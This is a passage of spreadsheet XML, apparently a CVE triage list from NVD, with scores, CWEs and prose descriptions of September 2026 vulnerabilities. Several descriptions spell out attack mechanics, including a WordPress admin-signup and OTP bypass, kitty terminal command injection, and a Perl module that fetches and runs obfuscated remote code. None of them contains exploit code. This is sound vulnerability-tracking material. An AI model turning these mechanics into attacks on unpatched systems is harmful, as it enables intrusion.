          <t>An integer overflow vulnerability exists in the MPack Node API in MPack 1.1.1 on 32-bit platforms. When parsing a specially crafted MessagePack array32 or map32 object with an excessively large element count, the page allocation size calculation in mpack_tree_parse_children() can overflow size_t and produce an undersized allocation. Subsequent parsing writes mpack_node_data_t records beyond the allocated heap buffer, resulting in heap-buffer-overflow, memory corruption, and denial of service.</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88351</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97230</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr">
        <is>
          <t>f5, python</t>
        </is>
      </c>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="S229" s="5" t="inlineStr">
        <is>
          <t>IO::Socket::SSL::SelfCertificate versions 1.00 for Perl contains malware which executes Python code from an obfuscated URL.
The generate_certificate runs a Python script saved as a certificate file.  The pyhton script attempts to retrieve code from a hardcoded http URL that is obfuscated with base64 encoding and run the response body directly.
The impact is that arbitrary code can be invoked as the user, without a dropped script being saved on the affected host.
The releases have no test scripts nor build hooks.  The intention may have been to trigger the payload after installation.
The dropper script is in lib/Crypt/SelfCertificate/sample/cert.pem.
This is similar to CVE-2026-95831 for the module Crypt::SelfCertificate.
The SHA-256 digests of the files are
    ba24ee8ec3b7f47f65bed62e16fb413ace50653cf44bd8ea90914390922831e0  IO-Socket-SSL-SelfCertificate-1.00.tar.gz
    821d38830e5eb8607738421c25ac25f59fff02a6ab67daa32fbd020429454dac  IO-Socket-SSL-SelfCertificate-1.00/lib/IO/Socket/SSL/SelfCertificate/sample/cert.pem
    d483cb7b23b7271cb11cf242bff4a2e1c02df0b9525eb0429abeea8961c399d5  IO-Socket-SSL-SelfCertificate-1.00-upload.tar.gz</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97230</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51994</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t>mcp-remote versions 0.1.32 through 0.1.38 are vulnerable to Server-Side Request Forgery (SSRF) via the resource_metadata URL extracted from a remote MCP server's WWW-Authenticate header</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51994</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92288</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t>Lemonldap::NG::Portal versions from 2.20.0 before 2.21.6, from 2.22.0 before 2.23.4 for Perl allow unauthenticated OAuth2 token introspection because checkEndPointAuthenticationCredentials does not verify the client secret of a public Relying Party.
checkEndPointAuthenticationCredentials() skips the secret comparison for a Relying Party marked public and still returns the authentication method deduced from the request, client_secret_basic or client_secret_post. introspection() rejects a caller only when that method is missing or none, so a request carrying a public client_id and an arbitrary or empty secret passes the endpoint's authentication check.
An attacker who holds an access token and knows the client_id of any public Relying Party can confirm the token is active and read its metadata, including scope, audience, expiry and the sub claim. The sub claim is computed with the calling Relying Party's user identifier attribute, so an attacker can translate a user identifier from one Relying Party to another, defeating per-client and pseudonymous identifiers.</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92288</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51997</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-918, CWE-94</t>
        </is>
      </c>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t>An issue in geelen mcp-remote 0.1.16 through 0.1.38 allows a remote attacker to execute arbitrary code via the open() functions</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51997</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85491</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>CWE-1023, CWE-706</t>
        </is>
      </c>
      <c r="S233" s="5" t="inlineStr">
        <is>
          <t>Catalyst::Seal versions before 0.03 for Perl allow one request to disable a path or route a later one past an authorization check via a dispatch memo keyed on the request path alone.
Catalyst::Seal replaces the dispatcher's prepare_action with a version that memoises how a path resolved: which dispatch type matched, at which level, and what was left over as arguments. The key is the request path and nothing else. Action roles that match on the method, content type, scheme or query make that resolution depend on state the key does not carry, so the memo answers for a request it was not built from.
A path that resolves to no action is memoised as well, and replaying that entry returns without consulting any dispatch type, so no action is set and the request fails. A GET of a path whose action is declared POST-only therefore disables that path for every later request, the correct POST included. An entry that did resolve replays the level the earlier descent reached. Where a POST-only action sits below a shallower action on the same path, a GET memoises the shallow route, and a later POST is dispatched there with an auto() guarding the deeper controller never running.
The memo is cleared only when an action is registered, which happens at setup, so an entry lasts for the life of the process, and its cap of 2048 entries bounds how many paths one caller can disable. In the configuration measured, the misroute lands on the less privileged action, so it is an authorization check not running rather than a privilege gain.</t>
        </is>
      </c>
      <c r="T233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85491</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88361</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S234" s="5" t="inlineStr">
        <is>
          <t>SumatraPDF 3.6.1 contains an integer overflow vulnerability in EngineMupdf::BuildPageLabelRec() when parsing PDF PageLabels /Nums entries.</t>
        </is>
      </c>
      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88361</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88362</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="S235" s="5" t="inlineStr">
        <is>
          <t>MuJS e892c9fdb contains an incorrect numeric conversion vulnerability in jsR_isindex() in jsrun.c. A specially crafted JavaScript input containing an excessively large numeric array index can cause an out-of-range floating-point value to be converted to an integer without proper range validation. This results in undefined behavior and can cause process termination, leading to denial of service.</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88362</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88373</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr"/>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S236" s="5" t="inlineStr">
        <is>
          <t>libde265 commit 4d45a6b contains a NULL pointer dereference vulnerability in the NAL parsing path. When de265_push_NAL() is called with a zero-length NAL unit, the resulting NAL_unit may retain a NULL backing buffer, which is subsequently passed as the destination argument to memcpy() in NAL_unit::set_data(). Although the copy length is zero, this violates the nonnull requirement of memcpy() and results in undefined behavior, causing process termination in UBSan-instrumented builds and denial of service.</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88373</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88388</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr"/>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S237" s="5" t="inlineStr">
        <is>
          <t>Espruino 2v29 (commit bffc6d0) contains a stack-based buffer overflow vulnerability in the JavaScript error stack-trace handling path on 64-bit builds. A remote attacker can supply JavaScript input that triggers an exception and reaches jslPrintTokenLineMarker(), which passes the address of a 4-byte int column variable to jsvGetLineAndCol() as a size_t pointer. jsvGetLineAndCol() performs an 8-byte write through the mismatched pointer, overwriting adjacent stack memory.</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88388</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88369</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr"/>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S238" s="5" t="inlineStr">
        <is>
          <t>zserge jsmn commit 25647e6 is vulnerable to Buffer Overflow in example/jsondump.c dump().</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88369</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T238"/>
  <conditionalFormatting sqref="E2:E238">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238">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38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CVE-2026-14281</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>The Automation Web Platform – Notifications and OTP for WooCommerce, Advanced Country Code plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 4.8.6. This is due to missing permission enforcement on the publicly accessible REST route `POST /wp-json/wawp/v1/signup/&lt;op&gt;` and the absence of a key allowlist in the `finish_registration_logic` function, which copies the attacker-controlled `wawp_custom_fields` parameter directly into `update_user_meta()` — allowing sensitive meta keys such as `wp_capabilities` and `wp_user_level` to be set by the caller. This makes it possible for unauthenticated attackers to register a new account with the administrator role and gain full administrative access to the site. When OTP verification is enabled at signup, the OTP session token (`otp_transient`) is returned in plaintext in the HTTP response body, and the `handle_magic_link_request()` handler marks that token as verified on any unauthenticated GET request containing it without ever checking the OTP code value — making the OTP step trivially bypassable with no inbox or SMS access required.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14281</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95832</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Special Elements in Output Used by a Downstream Component in the colour control escape code handler in kitty from 0.47.3 before 0.49.0 allows a program writing to the terminal to execute an arbitrary command in the user's shell, because color_control() in kitty/window.py answers a query for an unrecognised field name by placing that field name into the reply, and write_escape_code_to_child() in kitty/screen.c then writes the reply to the pseudoterminal master, where it is not distinguishable from input typed by the user, without neutralising it for the shell that reads it. The payload is reduced to printable ASCII before the field name is echoed, which is the restriction introduced in 0.47.3 as the fix for CVE-2026-54057, and the record and field separators ; and = are consumed as delimiters, but every other printable character survives, which is sufficient to compose a shell command. A newline is available from handle_remote_ssh() in kitty/window.py, which writes the bytes yielded by get_ssh_data() in kittens/ssh/utils.py, the first of which begin with a newline, to the pseudoterminal master before any credential carried in the request is checked. The reply is framed as an OSC sequence carrying the escape code number, the field name, and the literal value ?. This results in execution of an attacker-chosen command with the privileges of the user running the terminal.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95832</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39353</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>php, gin, rust, hp</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-732, CWE-98</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2-rc-1, InvoicePlane builds its permitted template list by scanning a PHP template directory that can be written through an administrator-controlled file-write capability. A malicious PHP file placed in the directory is automatically trusted by Mdl_templates and can be selected as public_invoice_template. When a public invoice is rendered, the guest View controller includes the trusted file and executes it with web-server privileges. This issue is fixed in version 1.7.2-rc-1.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39353</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42322</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
